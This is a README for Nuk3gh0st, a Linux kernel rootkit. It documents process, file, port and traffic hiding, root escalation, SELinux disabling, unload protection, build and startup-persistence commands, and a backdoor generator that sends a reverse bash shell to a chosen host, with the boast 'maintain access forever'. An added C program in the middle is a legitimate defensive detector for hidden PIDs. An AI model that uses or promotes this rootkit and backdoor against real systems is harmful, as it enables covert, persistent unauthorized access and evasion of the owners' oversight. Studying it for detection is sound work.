Universal Linux LKM rootkit, designed to work in any kernel version and both architectures (x86 and x64).
Please be aware of existing issues following the addition of the network traffic hiding functionality. Additionally, there is instability in multicore systems.
- Stable across kernel versions from 2.6.32 to 4.17.10 (see the table below).
- Tested on 17 different distros with different kernel versions.
- Can be enabled at system startup under sysv-init, upstart and systemd.
- Includes a backdoor generator; the generated backdoor runs at system startup and is hidden by the nuk3gh0st rootkit (files, processes and traffic).
- Temporarily disables SELinux, if present, so the rootkit can be loaded and enabled at startup without problems.
- Can hide files, processes, TCP and UDP ports (IPv4 and IPv6), and incoming and outgoing TCP traffic by IP address.
- Hides itself from lsmod, and hides its own files while the rootkit is loading.
- Easy to use, easy to build, and compiles cleanly without any warnings.
The rootkit can do the following:
- Grant root privileges to a userland process
- Hide process by PID
- Unhide a previously hidden process by PID
- Hide files or directories by their name
- Unhide previously hidden files or directories
- Hide TCP ports (for IPv4 and IPv6)
- Unhide previously hidden TCP ports
- Hide UDP ports (for IPv4 and IPv6)
- Unhide previously hidden UDP ports
- Hide incoming or outgoing TCP traffic by ip address
- Unhide previously hidden TCP traffic by ip address
- Hide itself
- Unhide itself
- Protect against being unloaded by the user
- Disable the unload protection
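The list above describes what the rootkit hides; the practical question for a defender is how such hiding is noticed. The program below is an added example, not code from the Nuk3gh0st project, showing the cross-view check for the PID hiding feature: a hook that filters the directory listing of /proc defeats ps and top, but the kernel still answers for the process through kill(pid, 0) and /proc/<pid>/status, so the two views are compared. It brute-forces every PID up to pid_max, snapshots the /proc listing into a bitmap, and reports PIDs that are alive but unlisted. It also handles the two cases that make a naive version useless: thread IDs, which are legitimately absent from the /proc listing and are told apart by the Tgid field of their status file, and processes that start or exit mid-scan, which are filtered by a second listing before anything is reported. It assumes a Linux host and no particular module or process name; the status text shown in comments is constructed for illustration.

```c
/* Added example, not part of the Nuk3gh0st project: a userland cross-view
 * check for the PID hiding listed above. Filtering the /proc listing defeats
 * ps and top, but the kernel still answers for the process via kill(pid, 0)
 * and /proc/<pid>/status, so the two views are compared. Linux only; run as
 * root so no PID is skipped for lack of permission. */
#include <dirent.h>
#include <errno.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>

/* One bit per PID: the set of PIDs a directory listing of /proc showed. */
static void mark(unsigned char *bits, long pid) { bits[pid >> 3] |= (unsigned char)(1u << (pid & 7)); }
static int marked(const unsigned char *bits, long pid) { return (bits[pid >> 3] >> (pid & 7)) & 1; }

/* A /proc entry name is a PID only if it is all digits in 1..pid_max;
 * "self", "sys", "thread-self" etc. return -1. */
static long parse_pid_entry(const char *name, long pid_max)
{
    char *end;
    long v = strtol(name, &end, 10);
    if (end == name || *end != '\0' || v <= 0 || v > pid_max) return -1;
    return v;
}

/* Tgid from the text of /proc/<pid>/status (e.g. "Name:\tbash\nTgid:\t1234\n",
 * constructed sample), or -1 if the line is missing. A thread that is not its
 * group leader is legitimately absent from the /proc listing; without this
 * check every thread on the host would be reported as "hidden". */
static long tgid_from_status_text(const char *text)
{
    const char *p = text;
    while (p && *p) {
        long v;
        if (sscanf(p, "Tgid: %ld", &v) == 1) return v;
        if ((p = strchr(p, '\n')) != NULL) p++;
    }
    return -1;
}

/* kill(pid, 0) delivers nothing: ESRCH means no such process, EPERM means it exists. */
static int pid_alive(pid_t pid) { return kill(pid, 0) == 0 || errno == EPERM; }

/* Bitmap of the PIDs in /proc, the getdents() view that ps and top rely on. */
static int snapshot_proc(unsigned char *bits, long pid_max)
{
    struct dirent *e;
    DIR *d = opendir("/proc");
    if (!d) return 0;
    memset(bits, 0, (size_t)(pid_max / 8 + 1));
    while ((e = readdir(d)) != NULL) {
        long v = parse_pid_entry(e->d_name, pid_max);
        if (v > 0) mark(bits, v);
    }
    closedir(d);
    return 1;
}

/* Live leader check. An unreadable status file (e.g. hidepid for non-root)
 * counts as "not a leader", so permission problems never become findings. */
static int is_group_leader(pid_t pid)
{
    char path[64], buf[4096];
    snprintf(path, sizeof path, "/proc/%ld/status", (long)pid);
    FILE *f = fopen(path, "r");
    if (!f) return 0;
    size_t n = fread(buf, 1, sizeof buf - 1, f);
    fclose(f);
    buf[n] = '\0';
    return tgid_from_status_text(buf) == (long)pid;
}

/* Brute-force 1..pid_max with kill() against a snapshot of the /proc listing.
 * Each candidate is confirmed against a fresh listing so that a process that
 * started after the snapshot is not reported. Returns the number found. */
static size_t find_hidden_pids(pid_t *out, size_t cap)
{
    long pid_max = 32768, p;
    size_t hits = 0;
    FILE *f = fopen("/proc/sys/kernel/pid_max", "r");
    if (f) { if (fscanf(f, "%ld", &pid_max) != 1) pid_max = 32768; fclose(f); }
    unsigned char *listed = malloc((size_t)(pid_max / 8 + 1));
    if (!listed || !snapshot_proc(listed, pid_max)) { free(listed); return 0; }
    for (p = 1; p <= pid_max && hits < cap; p++) {
        if (marked(listed, p) || !pid_alive((pid_t)p) || !is_group_leader((pid_t)p))
            continue;
        if (snapshot_proc(listed, pid_max) && !marked(listed, p) && pid_alive((pid_t)p))
            out[hits++] = (pid_t)p;                 /* still alive, still unlisted */
    }
    free(listed);
    return hits;
}

int main(void)
{
    pid_t hidden[64];
    size_t n = find_hidden_pids(hidden, 64);
    for (size_t i = 0; i < n; i++)
        printf("PID %ld is alive but not listed in /proc\n", (long)hidden[i]);
    if (n == 0) puts("no hidden PIDs found");
    return n ? 1 : 0;
}
```

Build with `gcc -O2 -o pidview pidview.c` and run it as root; a clean host prints `no hidden PIDs found`. The same cross-view idea applies to the other features in the list: lsmod reads /proc/modules, so a module unlinked from that list can be compared against the directories under /sys/module, and a listener hidden from /proc/net/tcp normally still makes a bind() on that port fail with EADDRINUSE.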
Distro | Kernel | Arch |
---|---|---|
Arch Linux 2018 | 4.17.10-1-ARCH | x86_64 |
Kali Linux (Rolling) | 4.17.9 | x86_64 |
Kali Linux (Rolling) | 4.16.18 | x86_64 |
Linux Mint 19 (Tara) | 4.15.0-20-generic | i686 |
Kali Linux (Rolling) | 4.14.0-kali3-amd64 | x86_64 |
Ubuntu 16.04.4 LTS | 4.13.0-36-generic | x86_64 |
Fedora 26 | 4.11.8-300.fc26 | x86_64 |
Ubuntu 17.04 | 4.10.0-19-generic | x86_64 |
Debian 9 | 4.9.0-7-686 | i686 |
Kali Linux (Rolling) | 4.4.142 | x86_64 |
Kali Linux (Rolling) | 3.16.57 | x86_64 |
Linux Mint 17 | 3.13.0-37-generic | x86_64 |
Wifislax | 3.12.36 | i686 |
Fedora 19 | 3.9.5-301.fc19 | x86_64 |
Ubuntu 12.10 | 3.5.0-17-generic | i686 |
Lihuen 5.10 (Debian based) | 3.2.0-4-amd64 | x86_64 |
Ubuntu 10.04.4 LTS | 2.6.32-38-generic-pae | i686 |
Install a compiler, the kernel headers and everything else needed to build the rootkit.
Debian/Ubuntu (apt):
apt-get update
apt-get install linux-headers-$(uname -r)
apt-get install build-essential
Fedora/CentOS (yum):
yum update
yum install kernel-devel-$(uname -r)
yum groupinstall "Development Tools"
Build and install rootkit:
make
make install
Load rootkit:
load-nuk3gh0st
Use rootkit:
nuk3gh0st --help
By Juan Schällibaum
Based on nurupo rootkit
Usage: nuk3gh0st [OPTION]...
Options:
--root-shell Grants you root shell access.
--hide-pid=PID Hides the specified PID.
--unhide-pid=PID Unhides the specified PID.
--hide-file=FILENAME Hides the specified FILENAME globally.
Must be a filename without any path.
--unhide-file=FILENAME Unhides the specified FILENAME.
--hide-tcp-port=PORT Hides the specified tcp PORT.
--unhide-tcp-port=PORT Unhides the specified tcp PORT.
--hide-tcp6-port=PORT Hides the specified tcp6 PORT.
--unhide-tcp6-port=PORT Unhides the specified tcp6 PORT.
--hide-udp-port=PORT Hides the specified udp PORT.
--unhide-udp-port=PORT Unhides the specified udp PORT.
--hide-udp6-port=PORT Hides the specified udp6 PORT.
--unhide-udp6-port=PORT Unhides the specified udp6 PORT.
--hide-tcp-packet=IP Hides tcp4 packets incoming or outgoing from IP.
--unhide-tcp-packet=IP Unhides tcp4 packets incoming or outgoing from IP.
--hide Hides the rootkit LKM.
--unhide Unhides the rootkit LKM.
--help Print this help message.
--protect Protects the rootkit from rmmod.
--unprotect Disables the rmmod protection.
Unload rootkit:
unload-nuk3gh0st
Enabling rootkit at system startup:
enable-nuk3gh0st
Disabling rootkit at system startup:
disable-nuk3gh0st
Use backdoor generator:
backdoor-generator --help
Generates a backdoor that sends a bash reverse TCP shell
every S seconds to host H, listening on port P,
and runs it on startup, hiding itself
with the Nuk3gh0st LKM rootkit.
In other words...
YOU CAN MAINTAIN ACCESS FOREVER AND EVER!
Usage:
backdoor-generator --host H --port P --sleep S
Generates a backdoor that sends a bash reverse TCP shell
every S seconds to host H listening on port P, and
runs it on startup.
backdoor-generator --remove
Removes the previously generated backdoor from startup,
along with its files.
backdoor-generator --help
Show this menu.
Uninstall rootkit:
make uninstall
This project is licensed under GPLv2.
Nuk3gh0st is based on nurupo/rootkit. It extends its functionality by incorporating both its own modules and those from other well-known rootkits. Additionally, it has been adapted to operate on a wide range of different kernels, undergoing thorough testing across various operating systems. However, it's important to note that the core of Nuk3gh0st is derived from nurupo's rootkit, and as such, nurupo deserves the majority of the credit.
Usage of nuk3gh0st for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.